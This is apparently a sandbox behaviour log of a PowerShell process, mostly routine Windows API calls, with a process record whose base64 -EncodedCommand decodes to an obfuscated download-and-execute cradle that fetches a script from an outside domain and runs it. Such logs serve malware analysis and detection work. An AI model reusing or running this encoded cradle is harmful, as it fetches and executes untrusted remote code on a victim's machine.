	[0977.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22db70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0977.165] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22db70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0977.167] CoTaskMemAlloc (cb=0x104) returned 0x29490b0
	[0977.167] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29490b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0977.167] CoTaskMemFree (pv=0x29490b0) 
	[0977.170] CoTaskMemAlloc (cb=0x104) returned 0x29490b0
	[0977.170] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29490b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0977.171] CoTaskMemFree (pv=0x29490b0) 
	[0977.171] CoTaskMemAlloc (cb=0x104) returned 0x29490b0
	[0977.171] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29490b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0977.171] CoTaskMemFree (pv=0x29490b0) 
	[0977.174] CoCreateGuid (in: pguid=0x22e188 | out: pguid=0x22e188*(Data1=0xfecb362b, Data2=0xad57, Data3=0x41b0, Data4=([0]=0x95, [1]=0xc9, [2]=0x2a, [3]=0x30, [4]=0xd8, [5]=0xf6, [6]=0xbd, [7]=0x87))) returned 0x0
	[0977.178] CoTaskMemAlloc (cb=0x104) returned 0x29490b0
	[0977.178] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29490b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0977.178] CoTaskMemFree (pv=0x29490b0) 
	[0977.181] CoTaskMemAlloc (cb=0x104) returned 0x29490b0
	[0977.181] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29490b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0977.181] CoTaskMemFree (pv=0x29490b0) 
	[0977.183] CoTaskMemAlloc (cb=0x104) returned 0x29490b0
	[0977.183] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29490b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0977.183] CoTaskMemFree (pv=0x29490b0) 
	[0977.200] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0980.012] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x22de30 | out: lpConsoleScreenBufferInfo=0x22de30) returned 1
	[0980.029] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0980.031] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x22de30 | out: lpConsoleScreenBufferInfo=0x22de30) returned 1
	[0980.032] GetVersionExW (in: lpVersionInformation=0x22ddc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x22ddc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0980.034] GetCurrentProcess () returned 0xffffffffffffffff
	[0980.035] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x22de58 | out: TokenHandle=0x22de58*=0x304) returned 1
	[0980.039] GetTokenInformation (in: TokenHandle=0x304, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x22dd78 | out: TokenInformation=0x0, ReturnLength=0x22dd78) returned 0
	[0980.040] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x32f930
	[0980.040] GetTokenInformation (in: TokenHandle=0x304, TokenInformationClass=0x8, TokenInformation=0x32f930, TokenInformationLength=0x4, ReturnLength=0x22dd78 | out: TokenInformation=0x32f930, ReturnLength=0x22dd78) returned 1
	[0980.043] DuplicateTokenEx (in: hExistingToken=0x304, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x22ded8 | out: phNewToken=0x22ded8*=0x300) returned 1
	[0980.043] GetTokenInformation (in: TokenHandle=0x304, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x22dd78 | out: TokenInformation=0x0, ReturnLength=0x22dd78) returned 0
	[0980.043] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x32f960
	[0980.043] GetTokenInformation (in: TokenHandle=0x304, TokenInformationClass=0x8, TokenInformation=0x32f960, TokenInformationLength=0x4, ReturnLength=0x22dd78 | out: TokenInformation=0x32f960, ReturnLength=0x22dd78) returned 1
	[0980.044] CheckTokenMembership (in: TokenHandle=0x300, SidToCheck=0x2f2d810*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x22dee8 | out: IsMember=0x22dee8) returned 1
	[0980.044] CloseHandle (hObject=0x300) returned 1
	[0980.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0980.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0980.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0980.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0980.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0980.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0980.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0980.086] CoTaskMemAlloc (cb=0x804) returned 0x294c080
	[0980.086] GetConsoleTitleW (in: lpConsoleTitle=0x294c080, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0980.086] CoTaskMemFree (pv=0x294c080) 
	[0981.429] CoTaskMemAlloc (cb=0x804) returned 0x294d930
	[0981.429] GetConsoleTitleW (in: lpConsoleTitle=0x294d930, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0981.430] CoTaskMemFree (pv=0x294d930) 
	[0981.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.432] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0981.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0982.280] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2c8
	[0982.282] CoCreateGuid (in: pguid=0x22dfd0 | out: pguid=0x22dfd0*(Data1=0xb72ee44f, Data2=0x65bd, Data3=0x45ce, Data4=([0]=0xac, [1]=0x5f, [2]=0x96, [3]=0x1e, [4]=0x9b, [5]=0x48, [6]=0x56, [7]=0x7a))) returned 0x0
	[0982.283] CoTaskMemAlloc (cb=0x104) returned 0x29490b0
	[0982.283] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29490b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.283] CoTaskMemFree (pv=0x29490b0) 
	[0982.649] WinSqmIsOptedIn () returned 0x0
	[0982.650] CoTaskMemAlloc (cb=0x104) returned 0x29490b0
	[0982.650] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29490b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.650] CoTaskMemFree (pv=0x29490b0) 
	[0982.650] CoTaskMemAlloc (cb=0x104) returned 0x29490b0
	[0982.650] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29490b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.651] CoTaskMemFree (pv=0x29490b0) 
	[0982.651] CoTaskMemAlloc (cb=0x104) returned 0x29490b0
	[0982.651] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29490b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.651] CoTaskMemFree (pv=0x29490b0) 
	[0982.652] CoTaskMemAlloc (cb=0x104) returned 0x29490b0
	[0982.652] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29490b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.652] CoTaskMemFree (pv=0x29490b0) 
	[0982.652] CoTaskMemAlloc (cb=0x104) returned 0x29490b0
	[0982.652] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29490b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.652] CoTaskMemFree (pv=0x29490b0) 
	[0982.654] CoTaskMemAlloc (cb=0x104) returned 0x29490b0
	[0982.654] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29490b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.654] CoTaskMemFree (pv=0x29490b0) 
	[0982.654] CoTaskMemAlloc (cb=0x104) returned 0x29490b0
	[0982.654] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29490b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.654] CoTaskMemFree (pv=0x29490b0) 
	[0982.655] CoTaskMemAlloc (cb=0x104) returned 0x29490b0
	[0982.655] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29490b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.655] CoTaskMemFree (pv=0x29490b0) 
	[0982.660] CoTaskMemAlloc (cb=0x104) returned 0x29490b0
	[0982.660] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29490b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.660] CoTaskMemFree (pv=0x29490b0) 
	[0982.666] CoTaskMemAlloc (cb=0x104) returned 0x29490b0
	[0982.666] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29490b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.666] CoTaskMemFree (pv=0x29490b0) 
	[0982.666] CoTaskMemAlloc (cb=0x104) returned 0x29490b0
	[0982.666] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29490b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.666] CoTaskMemFree (pv=0x29490b0) 
	[0982.666] CoTaskMemAlloc (cb=0x104) returned 0x29490b0
	[0982.666] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29490b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.666] CoTaskMemFree (pv=0x29490b0) 

Thread:
	id = 1084
	os_tid = 0x1610


Thread:
	id = 1107
	os_tid = 0x1604


Thread:
	id = 1364
	os_tid = 0x1f00


Thread:
	id = 1372
	os_tid = 0x1f38


Thread:
	id = 1447
	os_tid = 0x1aa8


Thread:
	id = 1546
	os_tid = 0x2078


Thread:
	id = 1625
	os_tid = 0x2218


Thread:
	id = 1646
	os_tid = 0x227c

	[0827.592] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0

Thread:
	id = 1769
	os_tid = 0x2078


Thread:
	id = 2149
	os_tid = 0x2094


Process:
	id = "182"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x18489000"
	os_pid = "0x1b60"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1030
	os_tid = 0x1b64

	[0554.406] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68
	[0826.627] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0834.145] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0834.147] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0834.147] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0834.147] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0919.340] sprintf_s (in: _DstBuf=0x1af478, _DstSize=0x11, _Format="get_%s" | out: _DstBuf="get_MemberType") returned 14
	[0941.514] GetVersionExW (in: lpVersionInformation=0x1adf80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1adf80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0941.515] GetVersionExW (in: lpVersionInformation=0x1adf80*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1adf80*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0941.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0941.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1adc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0941.527] GetVersionExW (in: lpVersionInformation=0x1adcf0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1adcf0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0941.528] SetErrorMode (uMode=0x1) returned 0x1
